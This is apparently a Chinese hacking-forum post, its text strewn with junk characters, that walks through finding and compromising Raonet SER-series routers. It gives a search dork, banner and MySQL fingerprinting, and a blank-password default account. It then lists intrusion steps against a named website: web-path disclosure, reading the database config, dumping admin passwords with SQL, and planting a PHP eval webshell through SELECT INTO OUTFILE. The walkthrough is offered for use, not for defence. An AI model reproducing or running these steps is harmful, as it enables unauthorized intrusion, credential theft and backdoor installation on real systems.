寻找存在漏洞的路由器方法:6 o) j9 P' l! q m) E1 r/ h; Q
6 ~# B) D" a3 W8 u1 i# \: s1:google搜索'Raonet Subscriber Ethernet Router'+ R, R0 P. C' \- j# q$ w
# C; N6 I9 Q* X0 Z
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001. C7 t5 v y! M4 w7 `- @8 M& q
2 {& p, z" @! j- ?. E
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! ]. R! b) \( F# D8 t9 F/ @8 U9 V" N
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
, o- q0 o! ~$ V9 H8 c# m( b0 | [
* m) c4 F0 e2 Y9 n- h3 ^" ] $ X2 u0 e( F' q4 _( N
( H& h! z& q' N' c* C0 q入侵步骤:. u Y& N, t, ?/ E6 N
3 q' X3 I$ g, ] _1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 j8 U! E( o+ R1 T$ b$ P B* R+ D3 L* a( e
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
" L1 P" Z0 @+ e' W( ^, `8 B" Y( K3:得到密码后连接,查看GUI管理密码:+ a+ j% i" k8 q! N( H! y* }" b9 G
use ser_500
6 \( I8 w) {0 _3 t' J0 I( S% Kselect id,passwd from user;4 \, Z9 V5 S1 E- W1 a
4:通过数据库写入webshell,执行命令:% Z7 w3 h$ S# p$ S5 r: p: B
use mysql;' E& i- N$ o$ E
create table ok(cmd TEXT); L0 }# d0 g3 v( u# {5 Q, m
insert into ok values("<?php @eval($_POST[cmd])?>");
3 [5 O$ h7 p' [+ R6 x3 ` c; Cselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
& |. j0 i& Z( `! U5 `drop table ok;: n/ K( |& N1 {" Z) m; O9 L. X( r/ [/ I
& [8 G2 D7 R0 V. S5:连接后门shell.php , J6 E; i: A3 I2 t. ]& y6 d# b. k
0 E k. H( L* E, n; v. a
6. 搞定!# [+ r" U# r, N9 L( {5 }' @
4 K8 t& \3 b6 K6 O1 {* r" [9 S
|